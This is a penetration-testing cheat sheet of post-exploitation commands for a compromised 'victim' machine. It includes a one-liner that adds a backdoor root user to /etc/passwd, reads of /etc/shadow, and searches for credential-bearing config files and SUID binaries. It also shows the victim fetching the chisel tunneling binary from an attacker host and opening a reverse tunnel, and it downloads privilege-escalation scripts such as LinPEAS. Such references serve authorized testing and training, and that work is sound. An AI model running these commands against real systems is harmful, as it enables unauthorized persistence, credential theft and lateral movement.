Persistence (Maintaining Access) - Privilege Escalation
After the elevation of privileges phase, comes the establishment of a constant access to the target (backdoor, persistence module...).
echo "root2:`openssl passwd toor`:0:0:root:/root:/bin/bash" >> /etc/passwd # to create another root user
User information gathering
Once we have a shell on the victim, we can get a lot of information about the target with the following commands
Linux
# DNS configuration
cat /etc/resolv.conf
# configuration file containing details about user accounts
cat /etc/passwd
# stores the hashed passphrase for Linux user account
cat /etc/shadow
whoami # Display the username associated with the current effective UID.
who -a # Display information about all connected users.
ip a # shows (IPv4 or IPv6) addresses on a device.
iptables -L # List all firewall rules.
# displays the routing table
ip r
netstat -r
# displays systems information
uname -a
ps aux
# List packages matching given pattern.
dpkg -l <pattern> list | grep installed
Windows
ipconfig /all
ipconfig /displaydns
netstat -bnao
netstat -r
net view
net view /domain
net user /domain
net user %username% /domain
net accounts
net localgroup administrators
net group "Domain controllers" /domain
net share
Linux Privilege Escalation
sudo -l # checks current privileges
cat /etc/sudoers.d/[filename]
netstat -ltupn # listening ports
ss -tulw # listening ports
cat /etc/crontab # checks cronjob
FIND
find / -iname "*config*.php" 2>/dev/null # looking for config files - cat [filename] | grep -i "db_"
find / -user root -perm -u=s 2>/dev/null # Find all files/dirs that are owned by root and have at least the SUID permission
find / -group [name] 2>/dev/null # Find all files/dirs owned by a group
find / -user [username] 2>/dev/null # Find all files/dirs owned by a user
-perm 444 # exactly readable by everyone
-perm /444 # only readable by everyone
-exec [command] [option] {}\; 2>/dev/null # {} corresponds to the files returned by the find command
Capabilities
getcap -r / 2>/dev/null # scan the system for capabilities.
GREP
grep -oE "\b([0-9]{1,3}\.){3}[0-9]{1,3}\b" # grep ip addresses from your output.
grep -rni "somethingToLookFor" / 2>/dev/null
Port forwarding
# on the attacker
cd /path/where/chisel/is # binary file
updog # or any other command to setup an http server
# on the victim
wget IP:PORT/chisel
chmod +x chisel # set it executable
# on the attacker
chisel server --reverse --port 9002 # port forwarding
# on the victim
./chisel client YOUR_IP:9002 R:9001:[redirectedIP]:[redirectedPort]
# Now you have access on the attacker's machine to : localhost:9001
Using SSH
ssh -N user@[IP_distant] -L [@_redirection_machine]:[port_redirection]:[IP_redirigee]:[port_redirige]
Example:
ssh -N user@10.10.10.10 -L 127.07.0.1:4441:192.168.0.100:80
On the 10.10.10.10
machine, user
is running a web server on its 192.168.0.100:80
interface. Here, we're redirecting to the 127.0.0.1
address and port 4441. So from the browser, http://127.0.0.1:4441 is reachable. By specifying a proxy on 172.17.0.2:4440
, it is possible to modify the requests on Burpsuite if needed.
Automated scripts for linux privesc
wget "https://github.com/diego-treitos/linux-smart-enumeration/raw/master/lse.sh" -O lse.sh;chmod 700 lse.sh
curl "https://github.com/diego-treitos/linux-smart-enumeration/raw/master/lse.sh" -Lo lse.sh;chmod 700 lse.sh
wget https://raw.githubusercontent.com/mzet-/linux-exploit-suggester/master/linux-exploit-suggester.sh -O les.sh;chmod 700 les.sh
LinPEAS - Linux Privilege Escalation Awesome Script
curl https://raw.githubusercontent.com/carlospolop/privilege-escalation-awesome-scripts-suite/master/linPEAS/linpeas.sh -Lo lPEAS.sh;chmod 700 lPEAS.sh